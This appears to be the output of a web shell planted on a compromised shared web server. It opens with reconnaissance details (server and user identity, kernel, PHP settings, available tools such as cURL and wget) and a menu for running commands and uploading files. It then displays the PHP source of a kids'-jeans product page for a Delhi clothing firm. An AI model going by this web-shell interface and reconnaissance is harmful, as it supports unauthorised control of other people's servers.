Server IP : 103.53.40.154 / Your IP : 3.147.51.75 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/deedeecreation.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once "admin/config.php";?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Best Kids Jeans Manufacturer in Delhi</title> <meta name="description" content="Are you looking for a Kids Jeans manufacturer in Delhi India? Dee Dee Creation is the best wholesaler and manufacturing company."> <?php include 'top-link.php';?> </head> <body> <?php include 'header.php';?> <section class="nav-burger py-3"> <div class="container"> <div class="row"> <div class="col"> <h2 class="text-center">KIDS JEANS</h2> <p class="text-center"><a href="<?php echo $wspath?>">Home </a><span> /</span> Kids Jeans</p> </div> </div> </div> </section> <section class="product-type mt-5 py-5"> <div class="container"> <div class="row"> <?php $sqlk = "SELECT * FROM `tbl_services` WHERE main_cat='Kids Jeans'"; $runk = mysqli_query($db,$sqlk) or die("Query Not run"); while($datak = mysqli_fetch_assoc($runk)){ ?> <!-- ......card-start.... --> <div class="col-md-4"> <a href="<?php echo $wspath?>products<?php echo $datak['url_link']?>.html"> <div class="box"> <p class="text-center"><?php echo $datak['property_name']?></p> </div> </a> </div> <?php } ?> <!-- ......card-end.... --> <!-- ......card-start.... --> <!--<div class="col-md-4">--> <!-- <a href="product.php">--> <!-- <div class="box">--> <!-- <p class="text-center">KNITTED</p>--> <!-- </div>--> <!-- </a>--> <!--</div>--> <!-- ......card-end.... --> </div> </div> </section> <?php include 'footer.php';?> </body> </html>